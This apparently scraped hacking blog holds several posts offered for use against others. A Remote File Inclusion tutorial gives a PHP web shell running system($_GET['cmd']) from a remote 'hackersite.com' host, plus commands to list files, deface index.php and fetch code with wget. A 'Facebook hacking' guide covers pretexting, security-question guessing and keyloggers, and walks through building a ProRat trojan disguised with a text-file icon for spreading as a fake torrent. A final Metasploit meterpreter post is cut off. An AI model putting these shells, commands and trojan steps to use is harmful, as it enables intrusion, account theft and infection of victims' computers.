low company morale are easy targets for giving up information without much thought. These employees must team to care about computer and company security as a whole.<br /><br />Conclusion<br /><br />All computer systems in the world must rely on human operators that have vulnerable characteristics. No matter how secure the equipment is from electronic invasion, the knowledge extracted from a legitimate user may render a computer network inoperable if used in an unauthorized manner. Hackers try to learn how to manipulate legitimate users into providing valuable network information. Once in, they may even use reverse social engineering to gain further access to the system- this golden method of hacking is easily prevented by education the users to be aware of such attacks, and to use wise judgment when providing others with company information.<br /><br /></b></span></div>
</div>
Indian4994http://www.blogger.com/profile/14173641514901570881noreply@blogger.com1tag:blogger.com,1999:blog-3299468824600484367.post-67206122970369293272011-09-10T06:22:00.000-07:002011-09-20T05:18:21.774-07:00Remote File Inclusion (RFI)<div dir="ltr" style="text-align: left;" trbidi="on">
RFI stands for Remote File Inclusion, and it allows the attacker to
upload a custom coded/malicious file on a website or server using a
script. <img align="right" alt="A simple tutorial to Remote File Inclusion (RFI) - theprohack.com" border="0" height="190" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKMn-IAdvMoII-H7MBR-GXYMr0WN0T6z0834RDVYUtokyyekU9239upgwmLW1lZgKWZ3RUECi_QmYYOv8C_XotoF3-3c25R2K6x2AZf7pkuhYr7oMLJpGjnP29HotbE-iwJwIGvZa4S9BT/?imgmax=800" style="border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; display: inline; margin-left: 0px; margin-right: 0px;" title="A simple tutorial to Remote File Inclusion (RFI) - theprohack.com" width="138" />The
vulnerability exploit the poor validation checks in websites and can
eventually lead to code execution on server or code execution on website
(<em>XSS attack using javascript</em>). This time, I will be writing a
simple tutorial on Remote File Inclusion and by the end of tutorial, i
suppose you will know what it is all about and may be able to deploy an
attack or two.<br />
RFI is a common vulnerability, and trust me all website <strong>hacking</strong>
is not exactly about SQL injection. Using RFI you can literally deface
the websites, get access to the server and do almost anything (<em>including gagging them out or beg..well that's an exaggeration but I guess you get the idea</em>
:P ) . What makes it more dangerous is that you only need to have your
common sense and basic knowledge of PHP to execute this one, some BASH
might come handy as most of servers today are hosted on <strong>Linux</strong>..<br />
Okay..Lets start..The first step is to find vulnerable site..you can easily find them using <strong>Google</strong> dorks..If you don't have any idea, you might want to read about <strong>advanced password hacking using Google dorks</strong> or to <strong>use automated tool to apply Google dorks</strong> using Google. Now lets assume we have found a vulnerable website<br />
<blockquote>
<a href="http://victimsite.com/index.php?page=home" rel="nofollow" target="_blank" title="Example of a victim site"><span style="font-family: Courier New;">http://victimsite.com/index.php?page=home</span></a><br />
</blockquote>
As
you can see, this website pulls documents stored in text format from
server and renders them as web pages. We can find ways around it as it
uses PHP include function to pull them out..check it out.<br />
<blockquote>
<a href="http://victimsite.com/index.php?page=http://hackersite.com/evilscript.txt" rel="nofollow" target="_blank" title="we upload our custom script here"><span style="font-family: Courier New;">http://victimsite.com/index.php?page=http://hackersite.com/evilscript.txt</span></a><br />
</blockquote>
I
have included a custom script “eveilscript” in text format from my
website, which contains some code..Now..if its a vulnerable website,
then 3 cases happen -<br />
<ul>
<li>Case 1 - You might have noticed
that the url consisted of “”page=home” had no extension, but I have
included an extension in my url,hence the site may give an error like “<em>failure to include evilscript.txt.txt</em>”, this might happen as the site may be automatically adding the .txt extension to the pages stored in server. </li>
<li>Case
2 - In case, it automatically appends something in the lines of .php
then we have to use a null byte “%00” in order to avoid error. </li>
<li>Case 3 – successfull execution :) </li>
</ul>
Now
once you have battled around this one, you might want to learn what to
code inside the script. You may get a custom coded infamous C99 script (<em>too bloaty but highly effective once deployed</em>) or you might code yourself a new one. For this knowledge of PHP might come in handy. Here we go<br />
<blockquote>
<span style="font-family: Courier New;"><?php </span><br />
<span style="font-family: Courier New;">echo "<script>alert(U 4r3 0wn3d !!);</script>"; <br />echo "Run command: ".htmlspecialchars($_GET['cmd']); </span><br />
<span style="font-family: Courier New;">system($_GET['cmd']);</span><br />
</blockquote>
<blockquote>
<span style="font-family: Courier New;">?> </span><br />
</blockquote>
The
above code allows you to exploit include function and tests if the site
if RFI (XSS) vulnerable by running the alert box code and if
successful, you can send custom commands to the linux server in bash.
So…If you are in luck and if it worked, lets try our hands on some Linux
commands. For example to find the current working directory of server
and then to list files, we will be using “pwd” and “ls” commands.<br />
<blockquote>
<span style="font-family: Courier New;">http//victimsite.com/index.php?<strong>cmd=pwd</strong>&page=http://hackersite.com/ourscript</span><br />
<span style="font-family: Courier New;">http//victimsite.com/index.php?<strong>cmd=ls</strong>&page=http://hackersite.com/ourscript</span><br />
</blockquote>
What
it does is that it sends the command as cmd we put in our script, and
begins print the working directory and list the documents..Even
better..you can almost make the page proclaim that you hacked it by
using the “echo” command..<br />
<blockquote>
<span style="font-family: Courier New;">cmd=echo U r pwn3d by xero> index.php</span><br />
</blockquote>
It
will then re-write the index.php and render it..In case,its a primitive
website which stores pages with .txt extension, you might want to put
it with along the .txt files.Now..as expected..We are now the alpha and
the omega of the website :) we can download, remove, rename, anything!
Want to download stuff ? try the “wget” function (<em>cmd=wget.. get the idea..</em>)..Want to move it out ? “mv”..<br />
I leave the rest on your creativity..<br />
<span style="font-weight:bold;"><a href="http://adf.ly/2exCt">COMPLETE HACKING IN ONE EBOOK DOWNLOAD NOW CERTIFIED ETHICAL COURSE FOR FREE </a></span>
</div>
Indian4994http://www.blogger.com/profile/14173641514901570881noreply@blogger.com5tag:blogger.com,1999:blog-3299468824600484367.post-44651677832094015772011-09-06T07:37:00.000-07:002011-09-06T07:37:44.697-07:00FACEBOOK HACKING COMPLETE GUIDE<div dir="ltr" style="text-align: left;" trbidi="on">
<a href="http://www.bageltechnews.com/wp-content/uploads/2011/01/facebook_hack.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img alt="http://cdn3.digitaltrends.com/wp-content/uploads/2009/12/facebook-privacy1.jpg" src="http://cdn3.digitaltrends.com/wp-content/uploads/2009/12/facebook-privacy1.jpg" style="height: 155px; width: 206px;" /></a><br />
<div class="MsoNormal">
<span style="font-family: Calibri;">Hello Guys Its me back with the latest post related to “<a href="http://www.devilscafe.co.cc/search/label/facebook">Facebook Hacking</a>”.</span></div>
<div class="MsoNormal">
<span style="font-family: Calibri;">Before
moving on I would give you a special NOTICE In my Blog I have posted
everything I have written and If that post was not written by me than I
would write the source from where I have copied you can check it too.</span></div>
<div class="MsoNormal">
<span style="font-family: Calibri;">So if you copy this post from my Blog <a href="http://www.devilscafe.co.cc/">http://www.devilscafe.co.cc/</a> than do write from where you have copied.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Calibri;">So now lets move on to the Topic.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b><span style="font-family: Calibri;">Facebook Hacking </span></b><span style="font-family: Calibri;">I
think most of you want to know how to hack Facebook password so in
this post I have posted everything you should know to hack someone’s
Facebook.</span></div>
<div class="MsoNormal">
<span style="font-family: Calibri;">I will first introduce you with some Old style Hacking to Hardcore Hacking.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Calibri;">First one with the old and most the common method of getting someone’s password</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="margin-left: 54pt; text-indent: -36pt;">
<span style="font-family: Calibri;">i)<span style="font: 7pt "Times New Roman";"> </span></span><b><span style="font-family: Calibri;">Primary mail</span></b><span style="font-family: Calibri;">-
You register your Facebook account from primary mail like yahoo,
Gmail, etc. If you get access to someone’s primary mail than you can
goto Forgot your password link get the confirmation code and access the
account.</span></div>
<div class="MsoNormal" style="margin-left: 54pt;">
<span style="font-family: Calibri;">But <b>How to get someone’s primary account’s password ?</b><br />Don’t
worry about it you should do just what I have told you firstly go to
yahoo.com(or other email provider) and press Forgot your password Link
there you will be asked some questions like Where were you born or
Where do you live By guessing this you can get the access to your
friends account.</span></div>
<div class="MsoNormal" style="margin-left: 54pt;">
<br /></div>
<div class="MsoNormal" style="margin-left: 54pt;">
<br /></div>
<div class="MsoNormal" style="margin-left: 54pt; text-indent: -36pt;">
<b><span style="font-family: Calibri;">ii)<span style="font: 7pt "Times New Roman";"> </span></span></b><b><span style="font-family: Calibri;">Social Engineering- </span></b><span style="font-family: Calibri;">I think many of you know what social engineering is. If you don’t know do not worry I am gonna explain it.<b><br /></b>Social
Engineering is a process of manipulating someone by pretending that
they are some one(like IT officer) and need your information to do some
certain researches.<br />Here is an example of it :<br /><br /><b><i>Conversation between an Elite Hacker and a Newbie person(NooB)</i><br /><br />Elite Hacker : </b>Hi I got a good news for you<br /><b>Newbie : </b>What??<b><br />Elite Hacker :</b> Do you want to learn hacking in few days.<br /><b><i>Newbie now being excited</i>Newbie : </b>Yeah Will you teach me ?<br /><b>Elite Hacker : </b>No I will post some of my Hacking Course video(top secret) in your account so give me your login details.<b><br /><i>Newbie without thinking of anything gives his Facebook details.<br /></i></b>This
is pretty much how someone can hack your Facebook by pretending. I
also used this process and hacked over 10+ account on my own.</span></div>
<div class="MsoNormal" style="margin-left: 18pt;">
<br /></div>
<div class="MsoNormal" style="margin-left: 18pt;">
<br /></div>
<div class="MsoNormal" style="margin-left: 54pt; text-indent: -36pt;">
<b><span style="font-family: Calibri;">iii)<span style="font: 7pt "Times New Roman";"> </span></span></b><b><span style="font-family: Calibri;">Friendship Attack-</span></b><span style="font-family: Calibri;">
This is not a hacking process but I have included you to give full
Guide. Ok friendship bomb is like Cheating your friend. You can install
some programs in your friends PC and you can threaten him/her to give
him/her password. Its kinna like Enemy attack.<br /></span></div>
<div class="MsoNormal" style="margin-left: 54pt; text-indent: -36pt;">
<b><span style="font-family: Calibri;">iv)<span style="font: 7pt "Times New Roman";"> </span></span></b><b><span style="font-family: Calibri;">Garbage Dumping- </span></b><span style="font-family: Calibri;">There
are many people who use long password and to remember they note that
password in the paper and stick is somewhere usually behind the
Keyboard. Sometimes they accidentally throw<b> </b>that paper in
garbage. To check this some Professional Hacker (usually Crackers)
search in the garbage of the person’s house. Its not like WHO WILL DO
THIS KIND OF STUFF? but once you get the password or any sensible
information than you make get an employment in Garbage Factory :P.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="margin-left: 54pt; text-indent: -36pt;">
<b><span style="font-family: Calibri;">v)<span style="font: 7pt "Times New Roman";"> </span></span></b><b><span style="font-family: Calibri;">Hiring a Hacker- </span></b><span style="font-family: Calibri;">There
is many hackers who crack someone’s password for you by paying. You
can even find someone online.(BUT NOT ME PLZ) and tell them to do.<br />Now
you have to be careful doing this cause there are many sites that tell
you that they will crack password for you by paying but all they are
doing is cheating on you so to confirm that they did hack the account
then tell them to give a screenshot of it or tell what message you have
send the user. This will make you safe if the hacker is fooling you.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="margin-left: 54pt; text-indent: -36pt;">
<b><span style="font-family: Calibri;">vi)<span style="font: 7pt "Times New Roman";"> </span></span></b><b><span style="font-family: Calibri;">Spam Hack-</span></b><span style="font-family: Calibri;">
Now this is more interesting. You may sometime have got spammed by
some application in Facebook. Some application send message like Look
how this girl killed herself after seeing this {link} now when you
click on the link you will to be spammed some application spam by
sending message in chat and some in Wall post.<br />Now we are taking
this step to hack someone’s account. First create a application in
Facebook which spam the user by telling [you] hacked my account praise
him. Here you means your name like example If I have put Arpit there
than It will say Arpit Hacked my account praise him. Now after looking
this people or your friends will think that I have hacked him/her and
people will gather around you. A neat way to cheat people ;).</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="margin-left: 54pt; text-indent: -36pt;">
<b><span style="font-family: Calibri;">vii)<span style="font: 7pt "Times New Roman";"> </span></span></b><b><span style="font-family: Calibri;">JavaScript-</span></b><span style="font-family: Calibri;">
Now all of my favorite web programming language’s turn. If you think
JavaScript is useless than you are Wrong. Its an very powerful language.<br />Now
this trick doesn’t hack your friends password but make your friend
look like they hacked. You can get a complex JavaScript which will
display You got Owned Now by telling your friends to put that code in
the browser’s address bar and Press Enter they will see a Box with you
got owned It’s a good way to scare someone.<br /><br /></span></div>
<div class="MsoNormal" style="margin-left: 18pt;">
<b><span style="font-family: Calibri;">Now talking about some hardcore hacking \m/</span></b></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b><span style="font-family: Calibri;">i) Key logger-</span></b><span style="font-family: Calibri;"> Very common and most used method for hacking someone’s Facebook account. You can download a key logger like Easy logger.</span></div>
<div class="MsoNormal">
<span style="font-family: Calibri;">Download Easy logger by searching on Google. Now once you download Easy Logger See the image below.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://file1.hpage.com/002715/46/bilder/finished1.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="223" src="http://file1.hpage.com/002715/46/bilder/finished1.jpg" width="320" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Calibri;">Don’t put your Using Gmail account info in that cause if an hacker caught the keylogger than he can retrive your Password.</span></div>
<div class="MsoNormal" style="margin-left: 18pt;">
<br /></div>
<div class="Default">
<b>ii)Rats-</b>
Now this is a real hardcore. Now this article is not written by me. To
save the time and delivery you fastly I have copied from The
Underground Hackers Handbook</div>
<div class="Default">
Begin-</div>
<div class="Default">
To show you an example of a malicious program, I will use a well known Windows Trojan, <u>ProRat</u>. </div>
<div class="Default">
1.
Download ProRat. Once it is downloaded right click on the folder and
choose to extract it. A password prompt will come up. The password will
be “<b>pro</b>”. </div>
<div class="Default">
2. Open up the program. You should see the following: </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMc_vB-4cr6LqI3y6nP7Hpr5zTUiopyqwZW_gP40aDmPaW_JIhDs0eUkV6qERsthjqcLD7swJO7xxm8EWz4zlLrHk-tdv1lHazaXnZccs9dLqrAkdAkzR_b70K4nPZUsj13wWYyMLkzr0/s1600/1.bmp" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="235" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMc_vB-4cr6LqI3y6nP7Hpr5zTUiopyqwZW_gP40aDmPaW_JIhDs0eUkV6qERsthjqcLD7swJO7xxm8EWz4zlLrHk-tdv1lHazaXnZccs9dLqrAkdAkzR_b70K4nPZUsj13wWYyMLkzr0/s320/1.bmp" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMc_vB-4cr6LqI3y6nP7Hpr5zTUiopyqwZW_gP40aDmPaW_JIhDs0eUkV6qERsthjqcLD7swJO7xxm8EWz4zlLrHk-tdv1lHazaXnZccs9dLqrAkdAkzR_b70K4nPZUsj13wWYyMLkzr0/s1600/1.bmp" style="margin-left: 1em; margin-right: 1em;"><br /></a></div>
<div class="MsoNormal" style="margin-left: 18pt;">
<br /></div>
<div class="Default">
<br /></div>
<div class="Default">
3. Next we will create the actual Trojan file. Click on <b>Create </b>and choose <b>Create ProRat Server</b>. </div>
<div class="Default">
<br /></div>
<div class="Default">
4.
Next put in your IP address so the server could connect to you. If you
don’t know your IP address click on the little arrow to have it filled
in for you automatically. Next put in your e-mail so that when and if a
victim gets infected it will send you a message. We will not be using
the rest of the options. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz21X-enwtfITrIbRzzaGaXjiFJ32eF-x64z2drueiiMcTym6tQVFnTNjkz_LOO_G6tFEOHsAGR-5w2a8OxZIICVeB9gYN3aE141hyphenhyphenvBzdBcxsX5HwXhtIHVMvhvHEKUzfWoB60Iv8iik/s1600/2.bmp" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="276" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz21X-enwtfITrIbRzzaGaXjiFJ32eF-x64z2drueiiMcTym6tQVFnTNjkz_LOO_G6tFEOHsAGR-5w2a8OxZIICVeB9gYN3aE141hyphenhyphenvBzdBcxsX5HwXhtIHVMvhvHEKUzfWoB60Iv8iik/s320/2.bmp" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz21X-enwtfITrIbRzzaGaXjiFJ32eF-x64z2drueiiMcTym6tQVFnTNjkz_LOO_G6tFEOHsAGR-5w2a8OxZIICVeB9gYN3aE141hyphenhyphenvBzdBcxsX5HwXhtIHVMvhvHEKUzfWoB60Iv8iik/s1600/2.bmp" style="margin-left: 1em; margin-right: 1em;"><br /></a></div>
<div class="MsoNormal" style="margin-left: 18pt;">
<span style="font-family: Calibri;"><br /></span></div>
<div class="MsoNormal" style="margin-left: 18pt;">
<br /></div>
<div class="Default">
<br /></div>
<div class="Default">
5. Click on the <b>General Settings </b>button
to continue. Here we will choose the server port the program will
connect through, the password you will be asked to enter when the victim
is infected and you wish to connect with them, and the victim name. As
you can see ProRat has the ability to disable the windows firewall and
hide itself from being displayed in the task manager. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtsX47M0kO97wbumJmiIc7tt9cLHrEvC2pfywCAx6Mad1cZv2bTIoAHvickLhjSKet5m4tvd_5uhavctUujohi-J_wZ5nrwW65rW4ycyNI_Z3oVQzLJg1J9ShE1MbOfdvNOXrlqTdj9tQ/s1600/3.bmp" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="277" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtsX47M0kO97wbumJmiIc7tt9cLHrEvC2pfywCAx6Mad1cZv2bTIoAHvickLhjSKet5m4tvd_5uhavctUujohi-J_wZ5nrwW65rW4ycyNI_Z3oVQzLJg1J9ShE1MbOfdvNOXrlqTdj9tQ/s320/3.bmp" width="320" /></a></div>
<div class="MsoNormal" style="margin-left: 18pt;">
<span style="font-family: Calibri;"><br /></span></div>
<div class="MsoNormal" style="margin-left: 18pt;">
<br /></div>
<div class="Default">
<br /></div>
<div class="Default">
6. Click on the <b>Bind with File </b>button
to continue. Here you will have the option to bind the trojan server
file with another file. Remember a trojan can only be executed if a
human runs it. So by binding it with a legitimate file like a text
document or a game, the chances of someone clicking it go up. Check the
bind option and select a file to bind it to. In the example I will use
an ordinary text document. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9I4WtC0Kw8u276XQg7dZ3LaYx5iOhMRMWS6ySYMaOOPohdgfKZhhg-uf_t4QlYyFUfNnFfnwrMUelGjv98FhuI63fmLIdxnt3Nu7bHjhdBQWCsvPq8Npl_5VssY0m_7h7azumbkDgSMI/s1600/4.bmp" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="278" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9I4WtC0Kw8u276XQg7dZ3LaYx5iOhMRMWS6ySYMaOOPohdgfKZhhg-uf_t4QlYyFUfNnFfnwrMUelGjv98FhuI63fmLIdxnt3Nu7bHjhdBQWCsvPq8Npl_5VssY0m_7h7azumbkDgSMI/s320/4.bmp" width="320" /></a></div>
<div class="MsoNormal" style="margin-left: 18pt;">
<span style="font-family: Calibri;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcezGIqCr1v-D4uhrKk3lpCbcZuio3oalcT2c2DPyZ5PMs7j4RFGXMpG4-Abhmojgt6dE64K7_UNzm8Uiu3OgFN55pqbkCwP9t4ee8jAIEeF8DIHGPDKMCmqyYJu_seF_okyx5bK-9jmM/s1600/5.bmp" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="227" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcezGIqCr1v-D4uhrKk3lpCbcZuio3oalcT2c2DPyZ5PMs7j4RFGXMpG4-Abhmojgt6dE64K7_UNzm8Uiu3OgFN55pqbkCwP9t4ee8jAIEeF8DIHGPDKMCmqyYJu_seF_okyx5bK-9jmM/s320/5.bmp" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjupv2ojyhWNvEmKSkz8NMWhTBfPc5cjQo5DcgtFTJmVbMQJMTWuDBLtdNsu-LUojKSUf1-125x6e867NG-8_KvYp_8Bt9cTTA-pnhWawVV1lUayc2vPr6nm29LPaMgU3bfVS7_4yxrAGE/s1600/6.bmp" style="margin-left: 1em; margin-right: 1em;"><br /></a></div>
<div class="MsoNormal" style="margin-left: 18pt;">
<span style="font-family: Calibri;"><br /></span></div>
<div class="MsoNormal" style="margin-left: 18pt;">
<br /></div>
<div class="Default">
<br /></div>
<div class="Default">
7. Click on the <b>Server Extensions </b>button
to continue. Here you choose what kind of server file to generate. I
will stick with the default because it has icon support, but exe’s looks
suspicious so it would be smart to change it. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMjPj2ylujk7IZT1e-IA9jz4_TSb3P7mm8pNHGji-m-i3nd56TI9PJAqEfJT-j3h00DO1Yu4clEX2pdjuczcVF4gxRnie1Bc3VW4PCkav1Mv-pU1Traxu04tZbRIbu5a7KuoBTx6aH-eI/s1600/7.bmp" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="278" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMjPj2ylujk7IZT1e-IA9jz4_TSb3P7mm8pNHGji-m-i3nd56TI9PJAqEfJT-j3h00DO1Yu4clEX2pdjuczcVF4gxRnie1Bc3VW4PCkav1Mv-pU1Traxu04tZbRIbu5a7KuoBTx6aH-eI/s320/7.bmp" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjupv2ojyhWNvEmKSkz8NMWhTBfPc5cjQo5DcgtFTJmVbMQJMTWuDBLtdNsu-LUojKSUf1-125x6e867NG-8_KvYp_8Bt9cTTA-pnhWawVV1lUayc2vPr6nm29LPaMgU3bfVS7_4yxrAGE/s1600/6.bmp" style="margin-left: 1em; margin-right: 1em;"><br /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMjPj2ylujk7IZT1e-IA9jz4_TSb3P7mm8pNHGji-m-i3nd56TI9PJAqEfJT-j3h00DO1Yu4clEX2pdjuczcVF4gxRnie1Bc3VW4PCkav1Mv-pU1Traxu04tZbRIbu5a7KuoBTx6aH-eI/s1600/7.bmp" style="margin-left: 1em; margin-right: 1em;"><br /></a></div>
<div class="MsoNormal" style="margin-left: 18pt;">
<span style="font-family: Calibri;"><br /></span></div>
<div class="MsoNormal" style="margin-left: 18pt;">
<br /></div>
<div class="Default">
<br /></div>
<div class="Default">
8.
Click on Server Icon to continue. Here you will choose an icon for
your server file to have. The icons help mask what the file actually
is. For my example I will choose the regular text document icon since
my file is a text document. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrLEtzKm56wuQ-cff33NZ5DTShn3EYxhdOVhEjc8DUxMhOuMOFQBrcamp7xbPi3M1Qum0OB1jzWz6eukKvFQm-n0gKEEnIDXU51k55kaI1dqs6PQfgVBGR_YxktJtT0NxU-59GtBNz8fQ/s1600/8.bmp" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="236" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrLEtzKm56wuQ-cff33NZ5DTShn3EYxhdOVhEjc8DUxMhOuMOFQBrcamp7xbPi3M1Qum0OB1jzWz6eukKvFQm-n0gKEEnIDXU51k55kaI1dqs6PQfgVBGR_YxktJtT0NxU-59GtBNz8fQ/s320/8.bmp" width="320" /></a></div>
<div class="Default">
<br /></div>
<div class="Default">
9. Finally click on Create Server to, you guessed it, create the server file. </div>
<div class="Default">
<br /></div>
<div class="Default">
10.
A hacker would probably rename it to something like “Funny Joke” and
send it as an attachment to some people. A hacker could also put it up
as a torrent pretending it is something else, like the latest game that
just came out so he could get people to download it. </div>
<div class="Default">
<br /></div>
<div class="Default">
11. Now, I will show you what happens when a victim installs the server onto his computer and what the hacker could do next. </div>
<div class="Default">
<br /></div>
<div class="Default">
12.
I’m going to run the server on my own computer to show you what would
happen. Once I run it the trojan will be installed onto my computer in
the background. The hacker would then get a message telling him that I
was infected. He would then connect to my computer by typing in my IP
address, port and clicking Connect. He will be asked for the password
that he made when he created the server. Once he types it in, he will
be connected to my computer and have full control over it. </div>
<div class="MsoNormal" style="margin-left: 18pt;">
<span style="font-family: Calibri;"><br /></span></div>
<div class="MsoNormal" style="margin-left: 18pt;">
<br /></div>
<div class="Default">
<br /></div>
<div class="Default">
15. Below is an image of my task bar after the hacker clicks on <b>Hide Start Button</b>. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-IyKrhaMVoN8Vxh0QapVM7Z03t659jZhIrJqJzwwb_C7EvE3QnNjVMoxwWU7YtDMmVf1pJXe-AflIfoXCRePtjLgEQJ17HDvzXiUWx0yF1XT_mkRVesN6S456C4cm9QQI_qFROZvn2jw/s1600/11.bmp" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-IyKrhaMVoN8Vxh0QapVM7Z03t659jZhIrJqJzwwb_C7EvE3QnNjVMoxwWU7YtDMmVf1pJXe-AflIfoXCRePtjLgEQJ17HDvzXiUWx0yF1XT_mkRVesN6S456C4cm9QQI_qFROZvn2jw/s1600/11.bmp" /></a></div>
<div class="MsoNormal" style="margin-left: 18pt;">
<span style="font-family: Calibri;"><br /></span></div>
<div class="MsoNormal" style="margin-left: 18pt;">
<br /></div>
<div class="Default">
<br /></div>
<div class="Default">
16. Below is an image of what the hacker would see if he chose to take a screen shot of the victims screen. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaKKeMdZlwOLClrl5NPpZnN9-eo7DuqJL2z8bPsNorr1nzZeV4NxSsmB3BJZv20ftf4cobabl_rgTSSvzAhyphenhyphenqTrF9Rz5D89pCswoCnDWpZQBm23nwqaOx8wX3CjDZcbrDxcMeOQiTF8a8/s1600/12.bmp" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaKKeMdZlwOLClrl5NPpZnN9-eo7DuqJL2z8bPsNorr1nzZeV4NxSsmB3BJZv20ftf4cobabl_rgTSSvzAhyphenhyphenqTrF9Rz5D89pCswoCnDWpZQBm23nwqaOx8wX3CjDZcbrDxcMeOQiTF8a8/s320/12.bmp" width="290" /></a></div>
<div class="MsoNormal" style="margin-left: 18pt;">
<span style="font-family: Calibri;"><br /></span></div>
<div class="MsoNormal" style="margin-left: 18pt;">
<br /></div>
<div class="MsoNormal" style="margin-left: 18pt;">
<span style="font-family: Calibri;">As
you saw in the above example, a hacker can do a lot of silly things or
a lot of damage to the victim. ProRat is a very well known trojan so
if the victim has an anti-virus program installed he most likely won’t
get infected. Many skilled hackers can program their own viruses and
Trojans that can easily bypass anti-virus programs.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b><span style="font-family: Calibri;">iii) Phishing-</span></b><span style="font-family: Calibri;"> Now you can get info about Phishing any where in Google Search in Google and Learn it.<br /><br />SECURITY OWNED IS NOT THE AUTHOR OF THIS POST<br />THIS POST IS CREATE BY <br />http://www.devilscafe.in<br />AUTHOR:MINHAL MENDHI <br />THIS POST IS COPYRIGHT PROTECTED<br />BY DEVILSCAFE<br />FIND SME COOL TRICK FROM</span><span style="font-family: Calibri;">http://www.devilscafe.in</span><br /><span style="font-family: Calibri;"><br /></span></div>
</div>
Indian4994http://www.blogger.com/profile/14173641514901570881noreply@blogger.com750tag:blogger.com,1999:blog-3299468824600484367.post-48513463992936694592011-09-06T03:12:00.000-07:002011-09-06T03:12:03.828-07:00Metasploit JAVA meterpreter payload<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>If you haven’t noticed the Metasploit Framework has a JAVA meterpreter payload for some time now</b>
</span></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>It supports all the commands supported by the PHP meterpreter, as of
SVN revision 9777, and additionally the ipconfig, route, and screenshot
commands.</b></span></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>It is not fully implemented into the framework yet and in order to get it up and running some manual tweaking is needed.</b></span></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>In this post I will show how to set it up and use it.</b></span></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>Further more, I have recreated my “Evil java applet wizard” to automate the the process of getting it up and running.</b></span></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>The script now supports a <strong>full java attack</strong> which includes the client side applet attack and uses the meterpreter java payload instead a binary executable.</b></span></div>
<div class="info_box" style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>Registered members can download the script at the end of this post (Script updated Aug 17) .</b></span></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
